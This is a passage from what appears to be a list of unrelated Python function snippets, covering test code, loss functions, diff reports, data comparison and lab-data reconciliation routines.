os.path.join(self.test_workspace,\n 'review_status_files')\n test_project_name = 'review_status_update_proj'\n\n plist_file = os.path.join(test_project_path, 'divide_zero.plist')\n source_file = os.path.join(test_project_path, 'divide_zero.cpp')\n plist_test.prefix_file_path(plist_file, test_project_path)\n\n codechecker_cfg = env.import_codechecker_cfg(self.test_workspace)\n codechecker_cfg['reportdir'] = test_project_path\n\n codechecker.store(codechecker_cfg, test_project_name)\n\n codechecker_cfg['trim_path_prefix'] = test_project_path\n\n # Run data for the run created by this test case.\n run_filter = RunFilter(names=[test_project_name], exactMatch=True)\n\n runs = self._cc_client.getRunData(run_filter, None, 0, None)\n run = runs[0]\n runid = run.runId\n logging.debug('Get all run results from the db for runid: ' +\n str(runid))\n\n reports = get_all_run_results(self._cc_client, runid)\n self.assertIsNotNone(reports)\n self.assertNotEqual(len(reports), 0)\n self.assertEqual(len(reports), 2)\n\n for report in reports:\n print(report)\n self.assertEqual(report.reviewData.status,\n ReviewStatus.INTENTIONAL)\n\n # Modify review comments from intentional to confirmed for the\n # second store.\n with open(source_file, 'r+', encoding='utf-8', errors='ignore') as sf:\n content = sf.read()\n new_content = content.replace(\"codechecker_intentional\",\n \"codechecker_confirmed\")\n sf.truncate(0)\n sf.write(new_content)\n\n # modify review comments and store the reports again\n with open(source_file, encoding='utf-8', errors='ignore') as sf:\n content = sf.read()\n\n # Update the plist file modification date to be newer than\n # the source file so it can be stored, because there was no\n # actual analysis.\n date = datetime.datetime.now() + datetime.timedelta(minutes=5)\n mod_time = time.mktime(date.timetuple())\n os.utime(plist_file, (mod_time, mod_time))\n\n codechecker.store(codechecker_cfg, test_project_name)\n\n # Check if all the review statuses were updated to the new at the\n # server.\n reports = get_all_run_results(self._cc_client, runid)\n self.assertIsNotNone(reports)\n self.assertNotEqual(len(reports), 0)\n self.assertEqual(len(reports), 2)\n for report in reports:\n self.assertEqual(report.reviewData.status, ReviewStatus.CONFIRMED)", "def calculate_loss(estimated_separation, true_separation, mask, true_latents, estimated_mix, true_mix, args):\n stats = torch.zeros(7)\n sdr = sdr_objective(estimated_separation, true_separation, mask)\n stats[:4] = sdr\n total_loss = -sdr.sum()\n reconstruction_sdr = sdr_objective(estimated_mix, true_mix).mean() if args.reconstruction_loss_weight > 0 else 0.0\n stats[4] = reconstruction_sdr\n total_loss += -args.reconstruction_loss_weight * reconstruction_sdr\n if args.similarity_loss_weight > 0.0 or args.dissimilarity_loss_weight > 0.0:\n mask = mask.squeeze(-1)\n true_latents = true_latents * mask.unsqueeze(-1).unsqueeze(-1)\n true_latents = true_latents.transpose(0, 1)\n dissimilarity = dissimilarity_loss(true_latents, mask) if args.dissimilarity_loss_weight > 0.0 else 0.0\n stats[5] = dissimilarity\n total_loss += args.dissimilarity_loss_weight * dissimilarity\n similarity = similarity_loss(true_latents, mask) if args.similarity_loss_weight > 0.0 else 0.0\n stats[6] = similarity\n total_loss += -args.similarity_loss_weight * similarity\n return total_loss, stats", "def _collect_lines( self, diffs ):\n\n\t\tfromlist, tolist, flaglist = [], [], []\n\t\t# pull from/to data and flags from mdiff style iterator\n\t\tfor fromdata, todata, flag in diffs:\n\t\t\ttry:\n\t\t\t\t# store HTML markup of the lines into the lists\n\t\t\t\tfromlist.append( self._format_line( 0, flag, *fromdata ) )\n\t\t\t\ttolist.append( self._format_line( 1, flag, *todata ) )\n\t\t\texcept TypeError:\n\t\t\t\t# exceptions occur for lines where context separators go\n\t\t\t\tfromlist.append( None )\n\t\t\t\ttolist.append( None )\n\t\t\tflaglist.append( flag )\n\t\treturn fromlist, tolist, flaglist", "def check_paths(self):\r\n\t\tself.check_line_edits_and_refresh_filestate()\r\n\t\t# paths\r\n\t\tsource_img_filename = self.source_img_entry.text().replace(\"\\\\\", \"/\")\r\n\t\tsink_dir_name = self.sink_dir_entry.text().replace(\"\\\\\", \"/\")\r\n\t\tsink_db_name_entry_text = self.sink_db_name_entry.text()\r\n\t\tdb_ext = \".db\" if not sink_db_name_entry_text.lower().endswith(\".db\") else \"\"\r\n\t\tsink_db_filename = os.path.join(sink_dir_name, sink_db_name_entry_text + db_ext).replace(\"\\\\\", \"/\")\r\n\t\tsource_db_filename = \"\"\r\n\r\n\t\t# check validity\r\n\t\tsource_img_filename_valid = self.filestate.is_valid(source_img_filename, SOURCE_IMG)\r\n\t\tsink_dir_name_valid = self.filestate.is_valid(sink_dir_name, SINK_DIR)\r\n\t\tsink_db_filename_valid = self.filestate.is_valid(sink_db_filename, SINK_DB)\r\n\t\tsource_db_filename_valid = True\r\n\r\n\t\tall_paths_valid = source_img_filename_valid and sink_dir_name_valid and sink_db_filename_valid\r\n\r\n\t\tif self.existing_case:\r\n\t\t\tsource_db_filename = self.source_db_entry.text()\r\n\t\t\tsource_db_filename_valid = self.filestate.is_valid(source_db_filename, SOURCE_DB)\r\n\t\t\tall_paths_valid = all_paths_valid and source_db_filename_valid\r\n\r\n\t\tif all_paths_valid:\r\n\t\t\tself.filestate.set_source_img_filename(source_img_filename)\r\n\t\t\tself.filestate.set_sink_dir_name(sink_dir_name)\r\n\t\t\tself.filestate.set_sink_db_filename(sink_db_filename)\r\n\t\t\tif self.existing_case:\r\n\t\t\t\tself.filestate.set_source_db_filename(source_db_filename)\r\n\t\t\tself.refresh_UI()\r\n\t\t\treturn True\r\n\r\n\t\t# in the case of invalidity\r\n\t\tif not source_img_filename_valid:\r\n\t\t\tif not self.filestate.source_img_file_exists:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source image file at does not exist.\")\r\n\t\t\telif not self.filestate.source_img_file_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source image file type is invalid (must be .npy).\")\r\n\t\t\tself.filestate.set_source_img_filename(\"\")\r\n\t\tif not source_db_filename_valid: # only if existing case\r\n\t\t\tif not self.source_db_file_exists:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source database file does not exist.\")\r\n\t\t\telif not self.filestate.source_db_file_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided source database file type is invalid (must be .db)\")\r\n\t\t\tself.filestate.set_source_db_filename(\"\")\r\n\t\tif not sink_dir_name_valid:\r\n\t\t\tif not self.filestate.sink_dir_exists:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided sink directory does not exist.\")\r\n\t\t\telif not self.sink_dir_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Provided sink directory format is invalid.\")\r\n\t\t\tself.filestate.set_sink_dir_name(\"\")\r\n\t\tif not sink_db_filename_valid:\r\n\t\t\tif sink_dir_name_valid and not self.filestate.sink_db_file_preexists and \\\r\n\t\t\t\t\tself.filestate.sink_db_file_format_valid and \\\r\n\t\t\t\t\tdisplay_yes_no_message(self, \"Create file at \" + sink_db_filename + \"?\"):\r\n\t\t\t\t# create file with read write permissions\r\n\t\t\t\t###########################################\r\n\t\t\t\ttry:\r\n\t\t\t\t\tsink_db_file = open(sink_db_filename, \"w+\")\r\n\t\t\t\t\tsink_db_file.close()\r\n\t\t\t\texcept IOError as error:\r\n\t\t\t\t\tdisplay_warning_message(self, \"Failed to create provided sink database file: \" + error)\r\n\t\t\t\t###########################################\r\n\t\t\t\t# set sink db filename\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.filestate.set_sink_db_filename(sink_db_filename)\r\n\t\t\t\t\tself.refresh_UI()\r\n\t\t\t\t\treturn True\r\n\t\t\telif not self.filestate.sink_db_file_format_valid:\r\n\t\t\t\tdisplay_warning_message(self, \"Be sure to specify a name for the sink database.\")\r\n\t\t\tself.filestate.set_sink_db_filename(\"\")\r\n\r\n\t\t# print(\"paths invalid\")\r\n\t\tself.refresh_UI()\r\n\t\treturn False", "def _abort_on_conflicting_untracked_paths(self) -> None:\n repo = get_git_repo()\n\n if not repo or self._base_commit is None:\n return\n\n changed_paths = set(\n self._status.added\n + self._status.modified\n + self._status.removed\n + self._status.unmerged\n )\n untracked_paths = {\n self._fname_to_path(repo, str(path))\n for path in (self._dirty_paths_by_status.get(StatusCode.Untracked, []))\n }\n overlapping_paths = untracked_paths & changed_paths\n\n if overlapping_paths:\n raise ActionFailure(\n \"Some paths that changed since the baseline commit now show up as untracked files. \"\n f\"Please commit or stash your untracked changes in these paths: {overlapping_paths}.\"\n )", "def __CompareText1(self, s1, s2,result):\n # lines with tag that are excluded by hand (by the user) \n s0_excluded=list()\n for l0 in self.excluded_lines.splitlines():\n s0_excluded.append(l0.strip()) \n\n s1_filtered=list()\n s2_filtered=list() \n for l1 in s1.splitlines(): \n if l1.__contains__(self.stdout_tag): \n check=0\n for k in s0_excluded: \n if l1.__contains__(k): check=check+1 \n if check==0: s1_filtered.append(l1.strip())\n for l2 in s2.splitlines(): \n if l2.__contains__(self.stdout_tag): \n check=0\n for k in s0_excluded: \n if l2.__contains__(k): check=check+1 \n if check==0: s2_filtered.append(l2.strip())\n # some debug: shows the lines which will be compared \n mm=''\n nTot=0\n nDif=0\n nMis=0\n for l in range(max(len(s1_filtered),len(s2_filtered))): \n nTot=nTot+1\n if ( l>len(s1_filtered)-1 ): # ref[l] exists but log[l] does not\n nMis=nMis+1\n if ( nMis<=5 ) : # print only the first 5 missing lines\n mm=mm+'\\n%5i'%l\n if ( nMis<5 ) :\n mm=mm+'-> log: ...MISSING('+repr(nMis)+')...'+'\\n' \n else:\n mm=mm+'-> log: ...MISSING(5)... SKIP THE REST'+'\\n' \n if(l<=len(s2_filtered)-1):\n mm=mm+' ref: '+s2_filtered[l]+'\\n'\n else:\n mm=mm+' ref: '+'\\n'\n elif( l>len(s2_filtered)-1 or # log[l] exists but ref[l] does not\n s1_filtered[l] != s2_filtered[l] ): # log[l] != ref[l]\n nDif=nDif+1\n mm=mm+'\\n%5i'%l\n mm=mm+'-> log: '+s1_filtered[l]+'\\n'\n if(l<=len(s2_filtered)-1):\n mm=mm+' ref: '+s2_filtered[l]+'\\n' \n else:\n mm=mm+' ref: '+'\\n' \n if(nDif>0 or nMis>0): mm=mm+'\\nSummary: '+repr(nDif)+' lines differ and '+repr(nMis)+' are missing out of '+repr(nTot)+' lines\\n'\n result[\"ExecTest.stdout_VS_expected_stdout\"] = result.Quote(mm)\n logger.debug('ExecTestBase2:__CompareTest1: '+mm) \n # Comparision of filtered sets \n # - filtered sets should have the same length: if this is not the \n # case the test will stop here \n if not(len(s1_filtered)==len(s2_filtered)): \n self.causes.append(' Different number of tagged lines to compare \\n'+\\\n 'in the stdout and ref_stdout')\n return False \n # Scan of the s1 and ref_s1=s2 looking for the '=' \n s1_filtered_equals=list()\n s2_filtered_equals=list() \n for i in range(len(s1_filtered)):\n if s1_filtered[i].__contains__('='):\n s1_filtered_equals.append(s1_filtered[i].replace(\\\n self.stdout_tag,'').strip())\n if s2_filtered[i].__contains__('='):\n s2_filtered_equals.append(s2_filtered[i].replace(\\\n self.stdout_tag,'').strip()) \n # - in case there is not '=' the strings have to be the same \n if(not(s1_filtered[i].__contains__('=')) and \n s2_filtered[i].__contains__('=')): return False \n if(not(s1_filtered[i].__contains__('=')) and \n not(s2_filtered[i].__contains__('=')) and \n not(s1_filtered[i]==s2_filtered[i])): return False \n\n # Analysis of lines with '='\n fail_cond=True \n logger.debug('ExecTestBase2:__CompareTest1: # lines with = is '+\\\n repr(len(s1_filtered_equals))) \n for i in range(len(s1_filtered_equals)):\n s1_split_list=s1_filtered_equals[i].split('=')\n s2_split_list=s2_filtered_equals[i].split('=')\n logger.debug('ExecTestBase2:__CompareTest1: right side of = for '+\\\n repr(i)+' are '+s1_split_list[1]+' '+s2_split_list[1])\n # - No local tolerance marked with '+-' in the s2\n if not(s2_split_list[1].__contains__('+-')):\n try: # integer and float to float\n s1_split_list_1=float(s1_split_list[1].strip())\n s2_split_list_1=float(s2_split_list[1].strip())\n # - comparison with global tolerance (if any) \n if(s1_split_list_1!=0.): \n if(not(s1_split_list[0]==s2_split_list[0]) or \n not((s1_split_list_1==s2_split_list_1) or \n ((s1_split_list_1<s2_split_list_1+\\\n s2_split_list_1*float(self.stdout_tol)/100) and \n (s1_split_list_1>s2_split_list_1-\n s2_split_list_1*float(self.stdout_tol)/100))) \n ): fail_cond=fail_cond and False \n else: # case = 0 \n if(not(s1_split_list[0]==s2_split_list[0]) or \n not((s1_split_list_1==s2_split_list_1) or \n ((s1_split_list_1<s2_split_list_1+\\\n float(self.stdout_tol)/100) and \n (s1_split_list_1>s2_split_list_1-\n float(self.stdout_tol)/100))) \n ): fail_cond=fail_cond and False \n logger.debug('ExecTestBase2:__CompareTest1: right side of = for '+\\\n repr(i)+' are '+repr(s1_split_list_1)+' '+\\\n repr(s2_split_list_1)+' with global tol (%) '+\\\n repr(self.stdout_tol)+' '+repr(fail_cond) )\n except: # strings\n s1_split_list[1]=s1_split_list[1].strip() \n s2_split_list[1]=s2_split_list[1].strip() \n logger.debug('ExecTestBase2:__CompareTest1: right side of = for '+\\\n repr(i)+' are '+s1_split_list[1]+' '+\\\n s2_split_list[1])\n if(not(s1_split_list[0]==s2_split_list[0]) or \n not(s1_split_list[1]==s2_split_list[1]) ): fail_cond=fail_cond and False \n else: \n # - comparison with local tolerance \n print 'mgallas, to be done local tolerance'\n return fail_cond\n\n for j in range(len(self.causes)):\n print 'mgallas causes '+causes[j]\n \n return True", "def do_comparison(found_file, created_file):\n\n fh_f, fh_c, data_f, data_c = get_data(found_file, created_file)\n\n print('Initial found data shape ', data_f.shape)\n print(' and created data shape= ', data_c.shape)\n\n # Compare slice i of created to slice i+1 in found\n if (data_f.shape[0] == 1): # NIRCAM\n data_f = data_f[0, :, :, :]\n if (data_c.shape[0] == 1): # to accept output of mc_4d\n data_c = data_c[0, :, :, :]\n data_c_start = data_c[:-1, :, :]\n data_f_end = data_f[1:, :, :]\n elif (fh_f['SCI'].header['NAXIS'] == 3): # NIRSPEC\n data_c_start = data_c[:-1, :, :]\n data_f_end = data_f[1:, :, :]\n elif (data_f.shape[0] > 1 and fh_f['SCI'].header['NAXIS'] == 4): # MIRI\n # concatenate copies of created data (except for the last frame)\n num_ints = int(fh_f[1].data.shape[0]) # number of integrations\n data_c_start = (np.repeat(data_c[:-1, :, :], num_ints, axis=0))\n data_f_end = data_f[:, 1:, :, :]\n data_c_start = data_c_start.reshape(data_f_end.shape)\n else:\n print(' FATAL ERROR - unsupported instrument')\n\n print('Truncated found data shape ', data_f_end.shape)\n print(' and truncated created data shape= ', data_c_start.shape)\n try:\n assert(data_f_end.shape == data_c_start.shape)\n except AssertionError:\n print(' FATAL ERROR: adjusted found data shape ', data_f.shape, \\\n ' is not the same as adjusted created data shape= ', data_c.shape)\n\n neither = (data_c_start == 0.) & (data_f_end == 0.)\n both = (data_c_start != 0.) & (data_f_end != 0.) # created CR was found\n c_only = (data_c_start != 0.) & (data_f_end == 0.) # created CR not found\n f_only = (data_c_start == 0.) & (data_f_end != 0.) # found CR was not created\n\n try:\n assert(neither.sum() + both.sum() + c_only.sum() + f_only.sum() \\\n == data_c_start.size)\n except AssertionError:\n print('FATAL ERROR: sum of components must equal total number of pixels ')\n\n print(' Within the input dataset cubes:')\n print(' Number of created but not found pixels: ', c_only.sum())\n print(' Number of found but not created pixels: ', f_only.sum())\n print(' Number of pixels that are both found and created: ', both.sum())\n print(' Number of pixels that are neither found nor created: ', neither.sum())\n print(' ')\n print(' The fraction of all pixels that were found only: ', \\\n float(f_only.sum()) / float(data_c_start.size))\n print(' The fraction of all pixels that were created only: ', \\\n float(c_only.sum()) / float(data_c_start.size))\n print(' The fraction of pixels in the created file having cosmic rays:', \\\n float(c_only.sum()) / (data_c_start.shape[-2] * data_c_start.shape[-1]))\n print(' ')\n\n write_files(neither, both, c_only, f_only, fh_c, data_c_start)", "def compute_diagnostics(self) -> Dict[str, Any]:\n return {}", "def verbose_loss(self, feedback: _Feedback, extra_info) -> Dict[str, _Array]:\n hint_preds, diff_logits, gt_diffs = extra_info\n\n for inp in feedback.features.inputs:\n if inp.location in [_Location.NODE, _Location.EDGE]:\n nb_nodes = inp.data.shape[1]\n break\n\n total_loss = 0.0\n lengths = feedback.features.lengths\n\n losses = {}\n if self.decode_diffs:\n for loc in _Location:\n for i in range(len(gt_diffs)):\n is_not_done = _is_not_done_broadcast(lengths, i, gt_diffs[i][loc])\n diff_loss = (\n jnp.maximum(diff_logits[i][loc], 0) -\n diff_logits[i][loc] * gt_diffs[i][loc] +\n jnp.log1p(jnp.exp(-jnp.abs(diff_logits[i][loc]))) * is_not_done)\n losses[loc.name + '_diff_%d' % i] = jnp.mean(diff_loss)\n\n if self.decode_hints:\n for truth in feedback.features.hints:\n for i in range(truth.data.shape[0] - 1):\n assert truth.name in hint_preds[i]\n pred = hint_preds[i][truth.name]\n is_not_done = _is_not_done_broadcast(lengths, i, truth.data[i + 1])\n if truth.type_ == _Type.SCALAR:\n if self.decode_diffs:\n total_loss = jnp.mean((pred - truth.data[i + 1])**2 *\n gt_diffs[i][truth.location] * is_not_done)\n else:\n total_loss = jnp.mean((pred - truth.data[i + 1])**2 * is_not_done)\n elif truth.type_ == _Type.MASK:\n if self.decode_diffs:\n total_loss = jnp.mean(\n jnp.maximum(pred, 0) - pred * truth.data[i + 1] +\n jnp.log1p(jnp.exp(-jnp.abs(pred))) *\n gt_diffs[i][truth.location] * is_not_done)\n else:\n total_loss = jnp.mean(\n jnp.maximum(pred, 0) - pred * truth.data[i + 1] +\n jnp.log1p(jnp.exp(-jnp.abs(pred))) * is_not_done)\n elif truth.type_ == _Type.MASK_ONE:\n if self.decode_diffs:\n total_loss = jnp.mean(\n -jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(\n pred) * is_not_done, axis=-1, keepdims=True) *\n gt_diffs[i][truth.location])\n else:\n total_loss = jnp.mean(-jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(\n pred) * is_not_done, axis=-1))\n elif truth.type_ == _Type.CATEGORICAL:\n if self.decode_diffs:\n total_loss = jnp.mean(\n -jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(\n pred), axis=-1, keepdims=True) *\n jnp.expand_dims(gt_diffs[i][truth.location], -1) *\n is_not_done)\n else:\n total_loss = jnp.mean(-jnp.sum(\n truth.data[i + 1] * jax.nn.log_softmax(pred), axis=-1) *\n is_not_done)\n elif truth.type_ == _Type.POINTER:\n if self.decode_diffs:\n total_loss = jnp.mean(-jnp.sum(\n hk.one_hot(truth.data[i + 1], nb_nodes) *\n jax.nn.log_softmax(pred),\n axis=-1) * gt_diffs[i][truth.location] * is_not_done)\n else:\n total_loss = jnp.mean(-jnp.sum(\n hk.one_hot(truth.data[i + 1], nb_nodes) *\n jax.nn.log_softmax(pred),\n axis=-1) * is_not_done)\n else:\n raise ValueError('Incorrect type')\n losses[truth.name + '_%d' % i] = total_loss\n return losses", "def reconcile_with_destination(self, exception_cls=None, print_messages=None):\n def print(*args, **kwargs):\n if print_messages:\n return __builtins__.print(*args, **kwargs)\n try:\n with pyodbc.connect(settings.LAB_IMPORT_DMIS_DATA_SOURCE) as cnxn:\n with cnxn.cursor() as self.cursor:\n for received_datetime, edc_specimen_identifier in self.received_items:\n try:\n packing_list_item = PackingListItem.objects.get(\n item_reference=edc_specimen_identifier, received=False)\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received)')\n except MultipleObjectsReturned:\n for packing_list_item in PackingListItem.objects.filter(\n item_reference=edc_specimen_identifier, received=False):\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received - dup)')\n except PackingListItem.DoesNotExist:\n pass\n for received_datetime, edc_specimen_identifier, alpha_code in self.stored_items:\n try:\n packing_list_item = PackingListItem.objects.get(\n item_reference=edc_specimen_identifier, received=False)\n Aliquot.objects.get(\n aliquot_identifier=edc_specimen_identifier, aliquot_type__alpha_code=alpha_code)\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received in storage)')\n except MultipleObjectsReturned:\n for packing_list_item in PackingListItem.objects.filter(\n item_reference=edc_specimen_identifier, received=False):\n self.update_packing_list_item(packing_list_item, received_datetime)\n print(edc_specimen_identifier + ' (received in storage - dup)')\n except PackingListItem.DoesNotExist:\n pass\n except Aliquot.DoesNotExist:\n print(edc_specimen_identifier + ' Wrong specimen type. Got {}.'.format(alpha_code))\n except pyodbc.Error as error:\n if exception_cls:\n raise exception_cls(str(error))\n else:\n raise\n print('Received packing list items for {}:'.format(\n site_mappers.get_current_mapper().map_area, PackingListItem.objects.filter(received=True).count()))\n for panel in PackingListItem.objects.values('panel__name').filter(received=True).annotate(Count('panel')):\n print('{}: {}'.format(panel.get('panel__name'), panel.get('panel__count')))\n print('List of pending packing list items for {}:'.format(site_mappers.get_current_mapper().map_area))\n for packing_list_item in PackingListItem.objects.filter(received=False).order_by('created'):\n try:\n item_datetime = packing_list_item.item_datetime.strftime('%Y-%m-%d')\n except AttributeError:\n item_datetime = None\n try:\n panel_name = packing_list_item.panel.name.replace(' ', '_')\n except AttributeError:\n panel_name = None\n print('{} {} pending {} {}'.format(\n packing_list_item.item_reference,\n packing_list_item.packing_list.timestamp,\n item_datetime,\n panel_name,\n ))", "def test_with_known_snapping_error_data():\n linestrings_loaded = (\n samples.results_in_non_simple_from_branches_and_nodes_linestring_list\n )\n linestrings = [ls for ls in linestrings_loaded if isinstance(ls, LineString)]\n assert len(linestrings_loaded) == len(linestrings)\n result, any_changed_applied = branches_and_nodes.snap_traces(\n linestrings, tests.snap_threshold\n )\n count = 0\n while any_changed_applied:\n result, any_changed_applied = branches_and_nodes.snap_traces(\n result, tests.snap_threshold\n )\n count += 1\n if count > 10:\n raise RecursionError(\"Expected count to stay under 11.\")\n\n for ls in result:\n assert ls.is_simple\n assert isinstance(ls, LineString)", "def render_diff_report():\n if nori.core.cfg['action'] == 'diff':\n diff_report = ' Diff Report '\n elif nori.core.cfg['action'] == 'sync':\n diff_report = ' Diff / Sync Report '\n diff_report = ('#' * len(diff_report) + '\\n' +\n diff_report + '\\n' +\n '#' * len(diff_report) + '\\n\\n')\n if nori.core.cfg['report_order'] == 'template':\n for template_index in diff_dict:\n template = nori.core.cfg['templates'][template_index]\n section_header = ('Template {0} ({1}):' .\n format(template_index,\n nori.pps(template[T_NAME_KEY])))\n section_header += '\\n' + ('-' * len(section_header)) + '\\n\\n'\n diff_report += section_header\n for diff_t in diff_dict[template_index]:\n exists_in_source = diff_t[0]\n source_row = diff_t[1]\n exists_in_dest = diff_t[2]\n dest_row = diff_t[3]\n has_been_changed = diff_t[4]\n if exists_in_source:\n source_str = nori.pps(source_row[1])\n elif exists_in_source is None:\n source_str = '[no value match in source database]'\n else:\n source_str = '[no key match in source database]'\n if exists_in_dest:\n dest_str = nori.pps(dest_row[1])\n elif exists_in_dest is None:\n dest_str = '[no value match in destination database]'\n else:\n dest_str = '[no key match in destination database]'\n if has_been_changed is None:\n changed_str = 'unchanged'\n elif not has_been_changed:\n changed_str = (\n 'partially changed - action may be needed!'\n )\n else:\n changed_str = 'changed'\n diff_report += (\n 'Source: {0}\\nDest: {1}\\nStatus: {2}\\n\\n' .\n format(source_str, dest_str, changed_str)\n )\n diff_report += '\\n'\n elif nori.core.cfg['report_order'] == 'keys':\n for key_str in diff_dict:\n section_header = ('Key tuple {0}:' .\n format(nori.pps(key_str)))\n section_header += '\\n' + ('-' * len(section_header)) + '\\n\\n'\n diff_report += section_header\n for diff_t in diff_dict[key_str]:\n template_index = diff_t[0]\n exists_in_source = diff_t[1]\n source_row = diff_t[2]\n exists_in_dest = diff_t[3]\n dest_row = diff_t[4]\n has_been_changed = diff_t[5]\n template = nori.core.cfg['templates'][template_index]\n if exists_in_source:\n num_keys = source_row[0]\n source_data = source_row[1]\n source_str = nori.pps(source_data[num_keys:])\n elif exists_in_source is None:\n source_str = '[no value match in source database]'\n else:\n source_str = '[no key match in source database]'\n if exists_in_dest:\n num_keys = dest_row[0]\n dest_data = dest_row[1]\n dest_str = nori.pps(dest_data[num_keys:])\n elif exists_in_dest is None:\n dest_str = '[no value match in destination database]'\n else:\n dest_str = '[no key match in destination database]'\n if has_been_changed is None:\n changed_str = 'unchanged'\n elif not has_been_changed:\n changed_str = (\n 'partially changed - action may be needed!'\n )\n else:\n changed_str = 'changed'\n diff_report += (\n 'Template: {0}\\nSource: {1}\\nDest: {2}\\n'\n 'Status: {3}\\n\\n' .\n format(template[T_NAME_KEY], source_str, dest_str,\n changed_str)\n )\n diff_report += '\\n'\n return diff_report.strip()", "def analyze_thresholds(datapath, threshold_lt1, threshold_lt2, normalize = True, save = 1):\n print 'analyzing thresholds...' \n current_dir = os.getcwd()\n os.chdir(datapath)\n files = os.listdir(datapath)\n\n for k in arange(len(files)):\n right_file = '.npz' in files[k]\n \n if right_file:\n data = numpy.load(datapath+'\\\\'+files[k])\n \n CR_cts_after_seq_lt1 = data['cr_hist_LT1_first']\n CR_cts_after_seq_lt2 = data['cr_hist_LT2_first']\n\n nr_of_counts = arange(len(CR_cts_after_seq_lt1))\n\n CR_cts_total_lt1 = data['cr_hist_LT1_total']\n CR_cts_total_lt2 = data['cr_hist_LT2_total']\n \n if normalize:\n CR_cts_after_seq_lt2 = CR_cts_after_seq_lt2/float(sum(CR_cts_after_seq_lt2))\n CR_cts_total_lt2 = CR_cts_total_lt2/float(sum(CR_cts_total_lt2))\n times_passed_after_seq_lt2 = CR_cts_after_seq_lt2[nr_of_counts>=threshold_lt2].sum()*100\n times_passed_overall_lt2 = CR_cts_total_lt2[nr_of_counts>=threshold_lt2].sum()*100\n \n CR_cts_after_seq_lt1 = CR_cts_after_seq_lt1/float(sum(CR_cts_after_seq_lt1))\n CR_cts_total_lt1 = CR_cts_total_lt1/float(sum(CR_cts_total_lt1))\n times_passed_after_seq_lt1 = CR_cts_after_seq_lt1[nr_of_counts>=threshold_lt1].sum()*100\n times_passed_overall_lt1 = CR_cts_total_lt1[nr_of_counts>=threshold_lt1].sum()*100\n else:\n times_passed_after_seq_lt2 = CR_cts_after_seq_lt2[nr_of_counts>=threshold_lt2].sum()/float(CR_cts_after_seq_lt2.sum())*100\n times_passed_overall_lt2 = CR_cts_total_lt2[nr_of_counts>=threshold_lt2].sum()/float(CR_cts_total_lt2.sum())*100\n times_passed_after_seq_lt1 = CR_cts_after_seq_lt1[nr_of_counts>=threshold_lt1].sum()*100/float(CR_cts_after_seq_lt1.sum())\n times_passed_overall_lt1 = CR_cts_total_lt1[nr_of_counts>=threshold_lt1].sum()*100/float(CR_cts_total_lt1.sum())\n\n\n #print 'After sequence: LT2 percentage passed = ',num2str(sum(times_passed_after_seq_lt2),1),'%'\n #print 'and LT1 percentage passed = ',num2str(sum(times_passed_after_seq_lt1),1),'%'\n\n Log = False\n\n figure6 = plt.figure(figsize=(16.0, 12.0))\n plt.subplot(223)\n plt.bar(nr_of_counts,CR_cts_after_seq_lt2,log=Log, color = 'm')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT2: CR counts after sequence, passed threshold: '+num2str(times_passed_after_seq_lt2,1)+'%')\n else:\n plt.title('CR counts after sequence')\n plt.xlim(0,25)\n \n plt.subplot(224)\n plt.bar(nr_of_counts,CR_cts_total_lt2,log=Log, color = 'm')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT2: all CR checks, passed threshold: '+num2str(times_passed_overall_lt2,1)+'%')\n else:\n plt.title('CR counts for all CR checks')\n plt.xlim(0,25)\n\n plt.subplot(221)\n plt.bar(nr_of_counts,CR_cts_after_seq_lt1,log=Log, color = 'b')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT1: CR counts after sequence, passed threshold: '+num2str(times_passed_after_seq_lt1,1)+'%')\n else:\n plt.title('CR counts after sequence')\n plt.xlim(0,50)\n \n plt.subplot(222)\n plt.bar(nr_of_counts,CR_cts_total_lt1,log=Log, color = 'b')\n plt.xlabel('Number of counts')\n plt.ylabel('Fraction of occurrences')\n if normalize:\n plt.title('LT1: all CR checks, passed threshold: '+num2str(times_passed_overall_lt1,1)+'%')\n else:\n plt.title('CR counts for all CR checks')\n plt.xlim(0,50)\n \n if save:\n if normalize:\n figure6.savefig('CR_information_LT1_and_LT2_normalized.pdf')\n else:\n figure6.savefig('CR_information_LT1_and_LT2.pdf')\n\n\n return times_passed_overall_lt1, times_passed_after_seq_lt1, times_passed_overall_lt2, times_passed_after_seq_lt2", "def dataframe_difference(df_from_nerc,df_from_pangea):\n if len(df_from_nerc)!=0: # nothing to insert or update if df_from_nerc is empty\n not_in_database=[\n df_from_nerc.iloc[i]['semantic_uri'] \n not in df_from_pangea['semantic_uri'].values \n for i in range(len(df_from_nerc))\n ] \n df_from_nerc['action']= np.where(not_in_database ,'insert', '') # if there are different elements we always have to insert them\n df_insert=df_from_nerc[df_from_nerc['action']=='insert']\n if len(df_insert)==0:\n df_insert=None\n ## update cond\n if len(df_from_pangea)!=0: # nothing to update if df_from_pangea(pangaea db) is empty\n in_database=np.invert(not_in_database)\n df_from_nerc_in_database=df_from_nerc[in_database] \n # create Timestamp lists with times of corresponding elements in df_from_nerc and df_from_pangea //corresponding elements chosen by semanntic_uri\n df_from_nerc_in_database_T=[\n df_from_nerc_in_database[df_from_nerc_in_database['semantic_uri']==s_uri]['datetime_last_harvest'].iloc[0] \n for s_uri in df_from_nerc_in_database['semantic_uri']\n ]\n df_from_pangea_T=[\n df_from_pangea[df_from_pangea['semantic_uri']==s_uri]['datetime_last_harvest'].iloc[0] \n for s_uri in df_from_nerc_in_database['semantic_uri']\n ]\n # create list of booleans (condition for outdated elements)\n df_from_nerc_in_database_outdated=[df_from_nerc_in_database_T[i]>df_from_pangea_T[i] for i in range(len(df_from_nerc_in_database_T))]\n 